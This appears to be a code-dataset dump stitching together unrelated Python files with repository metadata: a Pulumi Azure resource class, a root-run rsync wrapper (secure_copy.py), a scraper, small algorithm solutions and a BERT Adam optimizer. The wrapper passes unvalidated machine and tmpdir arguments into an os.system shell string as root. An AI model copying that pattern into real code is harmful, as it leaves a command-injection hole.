def host_pool_arm_path(self) -> pulumi.Input[str]:
"""
HostPool arm path of ApplicationGroup.
"""
return pulumi.get(self, "host_pool_arm_path")
@host_pool_arm_path.setter
def host_pool_arm_path(self, value: pulumi.Input[str]):
pulumi.set(self, "host_pool_arm_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="applicationGroupName")
def application_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the application group
"""
return pulumi.get(self, "application_group_name")
@application_group_name.setter
def application_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> Optional[pulumi.Input[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@friendly_name.setter
def friendly_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "friendly_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ApplicationGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_group_name: Optional[pulumi.Input[str]] = None,
application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
host_pool_arm_path: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Represents a ApplicationGroup definition.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a ApplicationGroup definition.
:param str resource_name: The name of the resource.
:param ApplicationGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_group_name: Optional[pulumi.Input[str]] = None,
application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
host_pool_arm_path: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
__props__.__dict__["application_group_name"] = application_group_name
if application_group_type is None and not opts.urn:
raise TypeError("Missing required property 'application_group_type'")
__props__.__dict__["application_group_type"] = application_group_type
__props__.__dict__["description"] = description
__props__.__dict__["friendly_name"] = friendly_name
if host_pool_arm_path is None and not opts.urn:
raise TypeError("Missing required property 'host_pool_arm_path'")
__props__.__dict__["host_pool_arm_path"] = host_pool_arm_path
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
__props__.__dict__["workspace_arm_path"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201110preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201019preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201019preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210309preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210309preview:ApplicationGroup"), 
pulumi.Alias(type_="azure-native:desktopvirtualization/v20210401preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210401preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210513preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210513preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210712:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210712:ApplicationGroup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ApplicationGroup, __self__).__init__(
'azure-native:desktopvirtualization/v20201110preview:ApplicationGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ApplicationGroup':
"""
Get an existing ApplicationGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
__props__.__dict__["application_group_type"] = None
__props__.__dict__["description"] = None
__props__.__dict__["friendly_name"] = None
__props__.__dict__["host_pool_arm_path"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["workspace_arm_path"] = None
return ApplicationGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Output[str]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> pulumi.Output[Optional[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@property
@pulumi.getter(name="hostPoolArmPath")
def host_pool_arm_path(self) -> pulumi.Output[str]:
    """ARM path of the HostPool this ApplicationGroup belongs to."""
    value = pulumi.get(self, "host_pool_arm_path")
    return value
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
    """The geo-location in which the resource lives."""
    value = pulumi.get(self, "location")
    return value
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """The resource's name."""
    value = pulumi.get(self, "name")
    return value
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """Resource tags attached to this ApplicationGroup, if any."""
    value = pulumi.get(self, "tags")
    return value
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
    """The type of the resource, e.g. 'Microsoft.Compute/virtualMachines' or
    'Microsoft.Storage/storageAccounts'."""
    value = pulumi.get(self, "type")
    return value
@property
@pulumi.getter(name="workspaceArmPath")
def workspace_arm_path(self) -> pulumi.Output[str]:
    """ARM path of the Workspace this ApplicationGroup is registered with."""
    value = pulumi.get(self, "workspace_arm_path")
    return value
| [
"[email protected]"
] | |
279eed71489f31473bd2805be9982a3c27f59f15 | 5a0122509b4e7e15e556460d261d9d8a1cee76ad | /enterprise/legacy/util/secure_copy.py | 2b45a64a6226ff68dc4b81f67bf5df35ab3997ac | [] | no_license | cash2one/BHWGoogleProject | cec4d5353f6ea83ecec0d0325747bed812283304 | 18ecee580e284705b642b88c8e9594535993fead | refs/heads/master | 2020-12-25T20:42:08.612393 | 2013-04-13T14:01:37 | 2013-04-13T14:01:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,671 | py | #!/usr/bin/python2.4
#
# Copyright 2006 Google Inc. All Rights Reserved.
"""
A script that can be used to copy files safely. It is intended to
be run as root by secure_script_wrapper, which has a limited list of
scripts that it runs, but does not limit the arguments for those
scripts. Thus, I created this rsync wrapper which, in turn, checks for
arguments and accepts only pairs of files from its list. This prevents
someone from overwriting files at random.
Usage:
secure_copy.py machine file tmpdir
"""
__author__ = '[email protected]'
import sys
import os
import string
from google3.pyglib import logging
import re
# Whitelist of files that secure_copy.py is allowed to copy.
# [\w\.]+ matches a string of at least 1 alphanumeric character and/or period.
# Each entry is a regex anchored with ^...$; CopyFile only rsyncs a path that
# matches one of these, preventing arbitrary file overwrites when run as root.
FILES = [
"^/export/hda3/[\w\.]+/local/conf/certs/server.crt$",
"^/export/hda3/[\w\.]+/local/conf/certs/server.key$"
]
def CopyFile(machine, file, tmpdir):
  """Rsync `file` from `machine` into place, but only for whitelisted paths.

  Returns a falsy value on rsync success, truthy (True or 1) on rsync failure
  or when `file` does not match any regex in FILES.
  """
  for pattern in FILES:
    if re.match(pattern, file):
      # NOTE(review): the command is built by string interpolation and run
      # through a shell; the FILES whitelist is what keeps this constrained.
      err = os.system("rsync -e ssh -c -a -T %s %s:%s %s" % (tmpdir, machine,
                                                             file, file))
      return err != 0
  logging.error("Attempting to copy unsecure file %s from %s as root "
                "(tmpdir=%s). See whitelist in secure_copy.py." %
                (file, machine, tmpdir))
  return 1
def main(argv):
  """Entry point: expects exactly [machine, file, tmpdir].

  Returns the module usage text on an arity mismatch, otherwise CopyFile's
  result (truthy on failure), which the caller passes to sys.exit.
  """
  if len(argv) == 3:
    return CopyFile(argv[0], argv[1], argv[2])
  return __doc__
############################################################################
if __name__ == '__main__':
  # Exit status propagates main()'s result (usage text or failure flag) to the shell.
  sys.exit(main(sys.argv[1:]))
############################################################################
| [
"[email protected]"
] | |
8d0d4c4039653373109cc15e7bb85a259398b3e2 | f59a104bc669d380f869e7156f0fff1b29d05190 | /FPAIT/show_data.py | 641a9c5edddaf32e17a2235ec35e1762cf138787 | [] | no_license | pratikm141/DXY-Projects | 479049fe8bad34e91b6f31f8fee5f6e5da763a6d | 497257de46416bfc2428f7ce3d1c75f9c8d1d737 | refs/heads/master | 2020-12-13T04:20:54.203204 | 2020-01-16T12:02:57 | 2020-01-16T12:02:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,417 | py | import os, pdb, json, sys, torch
import numpy as np
from pathlib import Path
lib_path = str((Path(__file__).parent.resolve() / 'lib').resolve())
if lib_path not in sys.path: sys.path.insert(0, lib_path)
from datasets import TICSample, TQASample
def show_vqa(data):
    """Print a short summary of a few-shot VQA split.

    Shows the training/testing sample counts and echoes the first three
    training samples.  `data` must provide 'training' and 'testing' lists.
    (The original also bound 'all_words', 'words_index', 'all_answers' and
    'answers_index' to locals it never used; those dead reads are removed.)
    """
    training = data['training']
    testing = data['testing']
    print('Few-shot VQA:')
    print(' ->> {:} training samples, {:} testing samples'.format(len(training), len(testing)))
    for idx, x in enumerate(training):
        if idx < 3:  # only preview the first few samples
            print(' ->> {:}/{:} : {:}'.format(idx, len(training), x))
def show_ic(data):
    """Print a short summary of a few-shot image-caption split.

    Shows the training/testing sample counts and echoes the first three
    training samples.  `data` must provide 'training' and 'testing' lists.
    (The original also bound 'all_words', 'all_blanks' and 'words2index' to
    locals it never used; those dead reads are removed.)
    """
    training = data['training']
    testing = data['testing']
    print('Few-shot Image Caption:')
    print(' ->> {:} training samples, {:} testing samples'.format(len(training), len(testing)))
    for idx, x in enumerate(training):
        if idx < 3:  # only preview the first few samples
            print(' ->> {:}/{:} : {:}'.format(idx, len(training), x))
print (' ->> {:}/{:} : {:}'.format(idx, len(training), x))
if __name__ == '__main__':
    # Summarise the Toronto COCO-QA few-shot VQA split...
    vqa_list_path = './data/Toronto-COCO-QA/object.pth'
    vqa_list = torch.load(vqa_list_path)
    show_vqa(vqa_list)
    print ('')
    # ...then the COCO few-shot captioning split.
    ic_list_path = './data/COCO-Caption/few-shot-coco.pth'
    ic_list = torch.load(ic_list_path)
    show_ic(ic_list)
| [
"[email protected]"
] | |
cd431507c5fc12ee3a008f88a24e2287be30d3bc | 59107025a7f9afe0f94d194d547d0354e11ff6e7 | /BrushingUp/challenge-1.0/1.1.1.py | f1752408adf04e930fbe972cee76912f013b3ec6 | [
"MIT"
] | permissive | samirsaravia/Python_101 | 083856643a5ca132f7126bb9a6b51b3805ba6bbe | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | refs/heads/master | 2022-12-19T16:12:20.751592 | 2020-10-19T12:30:18 | 2020-10-19T12:30:18 | 251,749,435 | 0 | 0 | MIT | 2020-10-19T12:45:40 | 2020-03-31T21:42:36 | Python | UTF-8 | Python | false | false | 393 | py | """
Write a function that calculates the sum of all integers up to n.Use the
iterative method and the formula and compare the results.
(sum of n integers given by S = (n(n+1))/2)
"""
def check_sum(number: int):
    """Compare the iterative sum 1 + 2 + ... + number with Gauss' closed form.

    Prints each term, then both totals, and returns (iterative, formula) so
    the equality can also be checked programmatically.
    """
    iterative_total = 0
    for i in range(1, number + 1):
        print(i)
        iterative_total += i
    # n*(n+1) is always even, so floor division is exact and keeps the result
    # an int (the original used '/', printing e.g. "6 6.0").
    formula_total = number * (number + 1) // 2  # S = n*(n+1)/2
    print(iterative_total, formula_total)
    return iterative_total, formula_total
check_sum(3)  # demo run: both methods should report 6
| [
"[email protected]"
] | |
98c593c049d3a848c1934ecead08298d9fe34a8c | 2118f244be2e09508e3c89dee432d4a75343b430 | /Python Docs/Web Crawlers/To Add or To Do/Interesting2/my_good_scraper_leagle.py | 8e012917eacef3ace6263248a136a549365a23b0 | [] | no_license | RamiJaloudi/Python-Scripts | 91d139093a95f9498a77b1df8ec2f790c4f4dd4c | 37e740a618ae543a02c38dc04a32ef95202ff613 | refs/heads/master | 2020-04-29T14:55:41.108332 | 2019-03-18T05:42:06 | 2019-03-18T05:42:06 | 176,212,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,249 | py | from bs4 import BeautifulSoup
import urllib, urlparse, re
def response(url):
    """Fetch `url`, regex-scrape <h3> headings and <h4></h4><p> snippets,
    print them and append them to leagle_findall.txt.

    NOTE(review): nothing is ever appended to `urls`, so the while loop body
    runs exactly once; `visited` is collected but never used.  The bare
    `except` swallows all fetch errors, which can leave `text` undefined for
    the code below.  Python 2 only (urllib.urlopen, print statements).
    """
    urls = [url] #stack of urls to scrape
    visited = [url] #historical record of urls
    while len(urls) >0:
        try:
            htmltext = urllib.urlopen(urls[0])
            text = htmltext.read()
        except:
            print(urls[0])
        #soup = BeautifulSoup(htmltext)
        urls.pop(0) #print len(urls)
        #print (soup.findAll('a', href=True))
        # First pass: capture every <h3>...</h3> heading (non-greedy).
        pat1 = re.compile(r'<h3>.+?</h3>', re.I|re.M)
        title1 = re.findall(pat1, str(text))
        print title1
        print '\n\n\n'
        saveFile = open ('leagle_findall.txt','a')
        saveFile.write(str(title1) + '\n\n\n')
        # Second pass: capture empty <h4> followed by a <p>...</p> snippet.
        pat2 = re.compile(r'<h4></h4><p>.+?</p>', re.I|re.M)
        title2 = re.findall(pat2, str(text))
        print title2
        print '\n\n\n'
        saveFile = open ('leagle_findall.txt','a')
        saveFile.write(str(title2) + '\n\n\n')
        ## pat3 = re.compile(r'<h4></h4><p>.+?</a>', re.I|re.M)
        ## title3 = re.findall(pat3, str(text))
        ## print title3
        ## print '\n\n\n'
        ## saveFile = open ('leagle_findall.txt','a')
        ## saveFile.write(str(title3) + '\n\n\n')
        ##
        ## saveFile.close()
##def response_tag_href(url):
## urls = [url] #stack of urls to scrape
## visited = [url] #historical record of urls
## while len(urls) >0:
## try:
## htmltext = urllib.urlopen(urls[0]).read()
## except:
## print(urls[0])
## soup = BeautifulSoup(htmltext)
## urls.pop(0) #print len(urls)
## #print (soup.findAll('a', href=True))
## for tag in soup.findAll('a', href=True):
## tag['href'] = urlparse.urljoin(url,tag['href'])
## if url in tag['href'] and tag['href'] not in visited:
## urls.append(tag['href'])
## visited.append(tag['href']) # historical record, whereas above line is temporary stack or queue
## # print visited
## print tag['href']
if __name__=='__main__':
    # Scrape the featured-decisions listing once; response() returns None,
    # so this prints "None" after the scraped output (Python 2 print).
    print response('http://leagle.com/featured-decisions')
    #print response_tag_href('http://leagle.com/decisions/latest/New%20Jersey')
| [
"[email protected]"
] | |
eb19e01a42618f687a04943c13d5c89c97b37dec | a75ac3c5c641fc00a3c403b08eeb6008f648639e | /LeetCode/832.py | 331d5d80ef7b89667b4bd89e0f838c52fcf341aa | [] | no_license | Greenwicher/Competitive-Programming | 5e9e667867c2d4e4ce68ad1bc34691ff22e2400a | 6f830799f3ec4603cab8e3f4fbefe523f9f2db98 | refs/heads/master | 2018-11-15T15:25:22.059036 | 2018-09-09T07:57:28 | 2018-09-09T07:57:28 | 28,706,177 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | class Solution:
def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]:
    """
    Flip each row of the binary matrix horizontally, then invert every bit.

    :type A: List[List[int]]
    :rtype: List[List[int]]

    Fix: the original return annotation said ``-> int`` although the function
    returns a matrix; corrected to ``List[List[int]]``.
    """
    # reversed(row) performs the horizontal flip; 1 - v inverts a 0/1 bit.
    return [[1 - v for v in reversed(row)] for row in A]
"[email protected]"
] | |
a9d29ebbde702add18b5001944a1e3609c515593 | d779bf5c892830d8810d079ab64b404674049586 | /dajare_detector/utils/base_task.py | 708e794b47f2b9b3c0741edd26739f4636f56a97 | [
"MIT"
] | permissive | vaaaaanquish/dajare-detector | 74d449a8ab5be2dd753551667cc73a2ed4f462fb | e8f2d6c861dc0e03b6bc38ba64463bf95376f949 | refs/heads/main | 2023-01-31T10:52:39.859129 | 2020-12-11T03:29:36 | 2020-12-11T03:29:36 | 318,274,737 | 15 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | import gokart
class DajareTask(gokart.TaskOnKart):
    """Base gokart task for this project; all tasks share one namespace."""
    # gokart uses this to qualify task names/parameters for the project.
    task_namespace = 'dajare'
| [
"[email protected]"
] | |
553fe2e6a47849a07c61ce50b28647576ae753b8 | 23130cd12e38dbce8db8102810edaad70b240ae2 | /lintcode/1375.2.py | 58bb3bdee68016c8f1865176bbbb0531b4055727 | [
"MIT"
] | permissive | kangli-bionic/algorithm | ee6687c82101088db20f10fb958b4e45e97d3d31 | c3c38723b9c5f1cc745550d89e228f92fd4abfb2 | refs/heads/master | 2023-01-05T09:29:33.204253 | 2020-10-25T17:29:38 | 2020-10-25T17:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | """
1375. Substring With At Least K Distinct Characters
"""
class Solution:
    """
    @param s: a string
    @param k: an integer
    @return: the number of substrings there are that contain at least k distinct characters
    """
    def kDistinctCharacters(self, s, k):
        # Sliding window: for each right end, shrink from the left while the
        # window still holds >= k distinct characters.  Every time the window
        # [left, right] qualifies, so do all of its extensions to the right,
        # contributing (len(s) - right) substrings at once.
        total = 0
        distinct = 0
        left = 0
        length = len(s)
        freq = [0] * 256  # per-character (byte) counts inside the window
        for right in range(length):
            code = ord(s[right])
            freq[code] += 1
            if freq[code] == 1:
                distinct += 1
            while left <= right and distinct >= k:
                total += length - right
                head = ord(s[left])
                freq[head] -= 1
                if freq[head] == 0:
                    distinct -= 1
                left += 1
        return total
| [
"[email protected]"
] | |
7241e0a95fca5db510f0dcef217558f23e7b7581 | 6db3955c3a1f0fa1d1effbe18844853df65dfeab | /lib/utils/optimization.py | 6f39283536094ec71cb8b85b3653a871f1e65e85 | [] | no_license | ZhuGeKongKong/OS-SGG | 8222c2d98b204a474f6f96b1bdaf08fc2fd4216a | c0648209598db475f2a369af833f26f4d6b50ddc | refs/heads/master | 2023-09-05T01:30:11.202473 | 2021-10-09T08:35:15 | 2021-10-09T08:35:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,103 | py | # coding=utf-8
# Copyright 2019 project LXRT
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch optimization for BERT model."""
import math
import torch
from torch.optim import Optimizer
from torch.optim.optimizer import required
import logging
logger = logging.getLogger(__name__)
def warmup_cosine(x, warmup=0.002):
    """Cosine learning-rate multiplier with linear warmup.

    ``x`` is the fraction of training completed (step / t_total).  During the
    first ``warmup`` fraction the multiplier ramps linearly 0 -> 1; afterwards
    it follows half a cosine wave from 1 down to 0 at x == 1.

    Bug fix: the original called torch.cos on a plain Python float, which
    raises a TypeError (torch.cos expects a tensor); math.cos is the correct
    scalar operation and is what later upstream releases use.
    """
    if x < warmup:
        return x/warmup
    return 0.5 * (1.0 + math.cos(math.pi * x))
def warmup_constant(x, warmup=0.002):
    """Constant schedule after a linear warmup.

    Linearly increases the multiplier from 0 to 1 over the first `warmup`
    fraction of training, then holds it at 1.0 for the remainder.
    """
    return x / warmup if x < warmup else 1.0
def warmup_linear(x, warmup=0.002):
    """Triangular schedule: peak 1.0 at x == warmup, then linear decay.

    Ramps linearly from 0 to 1 over the first `warmup` fraction of training,
    then decays linearly back to 0 at x == 1 (clamped at 0 beyond that).
    """
    if x >= warmup:
        decay = (x - 1.) / (warmup - 1.)
        return max(decay, 0)
    return x / warmup
# Registry mapping schedule names (the `schedule` argument of BertAdam)
# to their warmup functions.
SCHEDULES = {
    'warmup_cosine': warmup_cosine,
    'warmup_constant': warmup_constant,
    'warmup_linear': warmup_linear,
}
class BertAdam(Optimizer):
    """Implements BERT version of Adam algorithm with weight decay fix.
    Params:
        lr: learning rate
        warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
        t_total: total number of training steps for the learning
            rate schedule, -1 means constant learning rate. Default: -1
        schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
        b1: Adams b1. Default: 0.9
        b2: Adams b2. Default: 0.999
        e: Adams epsilon. Default: 1e-6
        weight_decay: Weight decay. Default: 0.01
        max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
    """
    def __init__(self, params, lr=required, warmup=-1, t_total=-1, schedule='warmup_linear',
                 b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01,
                 max_grad_norm=1.0):
        # Validate hyper-parameters up front so misconfigurations fail loudly.
        if lr is not required and lr < 0.0:
            raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
        if schedule not in SCHEDULES:
            raise ValueError("Invalid schedule parameter: {}".format(schedule))
        if not 0.0 <= warmup < 1.0 and not warmup == -1:
            raise ValueError("Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
        if not 0.0 <= b1 < 1.0:
            raise ValueError("Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
        if not 0.0 <= b2 < 1.0:
            raise ValueError("Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
        if not e >= 0.0:
            raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(e))
        defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
                        b1=b1, b2=b2, e=e, weight_decay=weight_decay,
                        max_grad_norm=max_grad_norm)
        super(BertAdam, self).__init__(params, defaults)

    def get_lr(self):
        # Report the currently scheduled learning rate for each parameter.
        lr = []
        for group in self.param_groups:
            for p in group['params']:
                state = self.state[p]
                if len(state) == 0:
                    # step() has not run yet for this parameter.
                    return [0]
                if group['t_total'] != -1:
                    schedule_fct = SCHEDULES[group['schedule']]
                    lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
                else:
                    lr_scheduled = group['lr']
                lr.append(lr_scheduled)
        return lr

    def step(self, closure=None):
        """Performs a single optimization step.
        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        warned_for_t_total = False
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
                state = self.state[p]
                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['next_m'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['next_v'] = torch.zeros_like(p.data)
                next_m, next_v = state['next_m'], state['next_v']
                beta1, beta2 = group['b1'], group['b2']
                # LXRT: grad is clipped outside.
                # Add grad clipping
                # if group['max_grad_norm'] > 0:
                #     clip_grad_norm_(p, group['max_grad_norm'])
                # Decay the first and second moment running average coefficient
                # In-place operations to update the averages at the same time
                next_m.mul_(beta1).add_(1 - beta1, grad)
                next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
                update = next_m / (next_v.sqrt() + group['e'])
                # Just adding the square of the weights to the loss function is *not*
                # the correct way of using L2 regularization/weight decay with Adam,
                # since that will interact with the m and v parameters in strange ways.
                #
                # Instead we want to decay the weights in a manner that doesn't interact
                # with the m/v parameters. This is equivalent to adding the square
                # of the weights to the loss with plain (non-momentum) SGD.
                if group['weight_decay'] > 0.0:
                    update += group['weight_decay'] * p.data
                if group['t_total'] != -1:
                    schedule_fct = SCHEDULES[group['schedule']]
                    # NOTE: progress uses state['step'] from *before* this update.
                    progress = state['step']/group['t_total']
                    lr_scheduled = group['lr'] * schedule_fct(progress, group['warmup'])
                    # warning for exceeding t_total (only active with warmup_linear
                    if group['schedule'] == "warmup_linear" and progress > 1. and not warned_for_t_total:
                        logger.warning(
                            "Training beyond specified 't_total' steps with schedule '{}'. Learning rate set to {}. "
                            "Please set 't_total' of {} correctly.".format(group['schedule'], lr_scheduled, self.__class__.__name__))
                        warned_for_t_total = True
                    # end warning
                else:
                    lr_scheduled = group['lr']
                update_with_lr = lr_scheduled * update
                p.data.add_(-update_with_lr)
                state['step'] += 1
                # step_size = lr_scheduled * math.sqrt(bias_correction2) / bias_correction1
                # No bias correction
                # bias_correction1 = 1 - beta1 ** state['step']
                # bias_correction2 = 1 - beta2 ** state['step']
        return loss
"[email protected]"
] | |
